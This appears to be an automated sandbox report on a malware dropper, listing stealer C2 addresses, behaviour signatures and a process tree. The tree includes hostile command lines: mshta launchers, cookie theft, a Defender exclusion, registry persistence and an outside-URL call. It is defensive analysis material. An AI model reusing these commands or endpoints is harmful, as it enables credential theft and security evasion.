Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1335s
  • max time network
    1778s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22-08-2021 13:45

General

  • Target

    Setup (12).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

1

C2

37.0.8.88:32122

Extracted

Family

vidar

Version

40.1

Botnet

921

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

63d550b5c5185e252a650ddb9bc95800dac04ff1

Attributes
  • url4cnc

    https://telete.in/h_manchik_1

rc4.plain
rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 2 IoCs
  • Vidar Stealer 5 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 17 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 30 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1272
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1456
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1896
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2688
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2712
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2672
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:5388
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2364
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1264
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1068
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:948
                      • C:\Users\Admin\AppData\Local\Temp\Setup (12).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (12).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:3024
                        • C:\Users\Admin\Documents\i7q1Ko7dRIIO7twAOQRlNLYB.exe
                          "C:\Users\Admin\Documents\i7q1Ko7dRIIO7twAOQRlNLYB.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2648
                        • C:\Users\Admin\Documents\nbCNv315NZJmNcdUGZrjuWY_.exe
                          "C:\Users\Admin\Documents\nbCNv315NZJmNcdUGZrjuWY_.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2732
                        • C:\Users\Admin\Documents\7XCgHSbnMMTTDbL78wWVrftQ.exe
                          "C:\Users\Admin\Documents\7XCgHSbnMMTTDbL78wWVrftQ.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:3860
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 660
                            3⤵
                            • Program crash
                            PID:4708
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 676
                            3⤵
                            • Program crash
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4076
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 684
                            3⤵
                            • Program crash
                            PID:356
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 700
                            3⤵
                            • Program crash
                            PID:4904
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 1176
                            3⤵
                            • Program crash
                            PID:4380
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 1120
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4588
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 1112
                            3⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5672
                        • C:\Users\Admin\Documents\MpBGnQKKQoNE_egUFigj04OD.exe
                          "C:\Users\Admin\Documents\MpBGnQKKQoNE_egUFigj04OD.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:192
                        • C:\Users\Admin\Documents\YNeP_C21HqkDGfPYvbjLQ_MP.exe
                          "C:\Users\Admin\Documents\YNeP_C21HqkDGfPYvbjLQ_MP.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3176
                          • C:\Users\Admin\Documents\YNeP_C21HqkDGfPYvbjLQ_MP.exe
                            C:\Users\Admin\Documents\YNeP_C21HqkDGfPYvbjLQ_MP.exe
                            3⤵
                            • Executes dropped EXE
                            PID:4912
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 1612
                              4⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5340
                        • C:\Users\Admin\Documents\R6h0tk5smefde1SQ2T5P1ey1.exe
                          "C:\Users\Admin\Documents\R6h0tk5smefde1SQ2T5P1ey1.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3348
                        • C:\Users\Admin\Documents\ylPvh_CFp2QGKoBOzECV80m_.exe
                          "C:\Users\Admin\Documents\ylPvh_CFp2QGKoBOzECV80m_.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:1628
                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:4324
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                                PID:2220
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                • Executes dropped EXE
                                PID:4224
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                  PID:7644
                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                3⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Drops file in Program Files directory
                                PID:4352
                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4396
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:3244
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                  • Executes dropped EXE
                                  PID:2276
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 4396 -s 820
                                  4⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5604
                            • C:\Users\Admin\Documents\kNZAC1Rnpn92w_bBimQWBRw6.exe
                              "C:\Users\Admin\Documents\kNZAC1Rnpn92w_bBimQWBRw6.exe"
                              2⤵
                                PID:3964
                              • C:\Users\Admin\Documents\fRvXdqAeQo7x3fzjWW0gsRMY.exe
                                "C:\Users\Admin\Documents\fRvXdqAeQo7x3fzjWW0gsRMY.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3212
                                • C:\Users\Admin\Documents\fRvXdqAeQo7x3fzjWW0gsRMY.exe
                                  "C:\Users\Admin\Documents\fRvXdqAeQo7x3fzjWW0gsRMY.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5904
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\fRvXdqAeQo7x3fzjWW0gsRMY.exe"
                                    4⤵
                                      PID:7200
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        5⤵
                                        • Delays execution with timeout.exe
                                        PID:8072
                                • C:\Users\Admin\Documents\7xZsHrmq6QdvgbqfpTu9Sazz.exe
                                  "C:\Users\Admin\Documents\7xZsHrmq6QdvgbqfpTu9Sazz.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2012
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 920
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5288
                                • C:\Users\Admin\Documents\aB7RzluELjUYqCf2diD65GIA.exe
                                  "C:\Users\Admin\Documents\aB7RzluELjUYqCf2diD65GIA.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2256
                                  • C:\Users\Admin\Documents\aB7RzluELjUYqCf2diD65GIA.exe
                                    C:\Users\Admin\Documents\aB7RzluELjUYqCf2diD65GIA.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4844
                                • C:\Users\Admin\Documents\PD8vdbASoFQP5nZj8eOaQUse.exe
                                  "C:\Users\Admin\Documents\PD8vdbASoFQP5nZj8eOaQUse.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2740
                                • C:\Users\Admin\Documents\YggQUoi5Tc5JM05UhHCK26yi.exe
                                  "C:\Users\Admin\Documents\YggQUoi5Tc5JM05UhHCK26yi.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2480
                                  • C:\Users\Admin\Documents\YggQUoi5Tc5JM05UhHCK26yi.exe
                                    "C:\Users\Admin\Documents\YggQUoi5Tc5JM05UhHCK26yi.exe" -q
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4616
                                • C:\Users\Admin\Documents\f2_uyE3_531THre6NcLuaZez.exe
                                  "C:\Users\Admin\Documents\f2_uyE3_531THre6NcLuaZez.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2460
                                  • C:\Users\Admin\Documents\f2_uyE3_531THre6NcLuaZez.exe
                                    C:\Users\Admin\Documents\f2_uyE3_531THre6NcLuaZez.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4816
                                • C:\Users\Admin\Documents\3g5SupC50PIpet1W9aa7CznV.exe
                                  "C:\Users\Admin\Documents\3g5SupC50PIpet1W9aa7CznV.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2448
                                • C:\Users\Admin\Documents\sJAA6rkFEUJqojjQ8RcJhRzO.exe
                                  "C:\Users\Admin\Documents\sJAA6rkFEUJqojjQ8RcJhRzO.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3772
                                • C:\Users\Admin\Documents\Jy9wM7vNQm5iEBmwWiuE5zkW.exe
                                  "C:\Users\Admin\Documents\Jy9wM7vNQm5iEBmwWiuE5zkW.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2176
                                • C:\Users\Admin\Documents\nO4xcRfHpLriKdYjBla2m4Zb.exe
                                  "C:\Users\Admin\Documents\nO4xcRfHpLriKdYjBla2m4Zb.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:204
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\nO4xcRfHpLriKdYjBla2m4Zb.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\nO4xcRfHpLriKdYjBla2m4Zb.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                    3⤵
                                      PID:4300
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\nO4xcRfHpLriKdYjBla2m4Zb.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\nO4xcRfHpLriKdYjBla2m4Zb.exe" ) do taskkill -f -iM "%~NxA"
                                        4⤵
                                          PID:4768
                                          • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                            hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2796
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                              6⤵
                                                PID:3720
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                  7⤵
                                                    PID:804
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                  6⤵
                                                  • Loads dropped DLL
                                                  PID:2188
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill -f -iM "nO4xcRfHpLriKdYjBla2m4Zb.exe"
                                                5⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4308
                                        • C:\Users\Admin\Documents\LUi1P16Fi5dMN9K3A3ig2cEh.exe
                                          "C:\Users\Admin\Documents\LUi1P16Fi5dMN9K3A3ig2cEh.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1400
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\LUI1P1~1.DLL,s C:\Users\Admin\DOCUME~1\LUI1P1~1.EXE
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Loads dropped DLL
                                            PID:5240
                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\LUI1P1~1.DLL,a18MZjY1
                                              4⤵
                                              • Blocklisted process makes network request
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              • Modifies system certificate store
                                              PID:6792
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\LUI1P1~1.DLL
                                                5⤵
                                                  PID:5840
                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\LUI1P1~1.DLL,T0MLVnVEaVE=
                                                  5⤵
                                                  • Loads dropped DLL
                                                  • Suspicious use of SetThreadContext
                                                  • Checks processor information in registry
                                                  PID:6976
                                                  • C:\Windows\system32\rundll32.exe
                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                    6⤵
                                                    • Modifies Internet Explorer settings
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:6328
                                                    • C:\Windows\system32\ctfmon.exe
                                                      ctfmon.exe
                                                      7⤵
                                                        PID:5656
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp212D.tmp.ps1"
                                                    5⤵
                                                      PID:6352
                                              • C:\Users\Admin\Documents\5pP3EPdTCrnvEP8mRjtSWalX.exe
                                                "C:\Users\Admin\Documents\5pP3EPdTCrnvEP8mRjtSWalX.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of WriteProcessMemory
                                                PID:4192
                                                • C:\Users\Admin\AppData\Local\Temp\is-MG8TT.tmp\5pP3EPdTCrnvEP8mRjtSWalX.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-MG8TT.tmp\5pP3EPdTCrnvEP8mRjtSWalX.tmp" /SL5="$10282,138429,56832,C:\Users\Admin\Documents\5pP3EPdTCrnvEP8mRjtSWalX.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:4288
                                                  • C:\Users\Admin\AppData\Local\Temp\is-KVJ7N.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-KVJ7N.tmp\Setup.exe" /Verysilent
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4904
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks processor information in registry
                                                      PID:2216
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                        6⤵
                                                          PID:5488
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im runvd.exe /f
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:5992
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            7⤵
                                                            • Delays execution with timeout.exe
                                                            PID:8116
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                        5⤵
                                                          PID:5016
                                                          • C:\Users\Admin\AppData\Local\Temp\is-JCRGG.tmp\Inlog.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-JCRGG.tmp\Inlog.tmp" /SL5="$B004A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                            6⤵
                                                              PID:1792
                                                              • C:\Users\Admin\AppData\Local\Temp\is-370M6.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-370M6.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                7⤵
                                                                  PID:6008
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-OCJNE.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-OCJNE.tmp\Setup.tmp" /SL5="$3045C,17361543,721408,C:\Users\Admin\AppData\Local\Temp\is-370M6.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    PID:724
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-6OF3T.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                      9⤵
                                                                        PID:6800
                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-6OF3T.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                          10⤵
                                                                          • Drops file in Windows directory
                                                                          PID:1688
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                        9⤵
                                                                          PID:8944
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                            10⤵
                                                                              PID:8932
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                            9⤵
                                                                              PID:6808
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-6OF3T.tmp\{app}\vdi_compiler.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-6OF3T.tmp\{app}\vdi_compiler"
                                                                              9⤵
                                                                                PID:6856
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-6OF3T.tmp\{app}\vdi_compiler.exe"
                                                                                  10⤵
                                                                                    PID:8640
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      11⤵
                                                                                      • Loads dropped DLL
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:6012
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping localhost -n 4
                                                                                      11⤵
                                                                                      • Runs ping.exe
                                                                                      PID:6932
                                                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:864
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
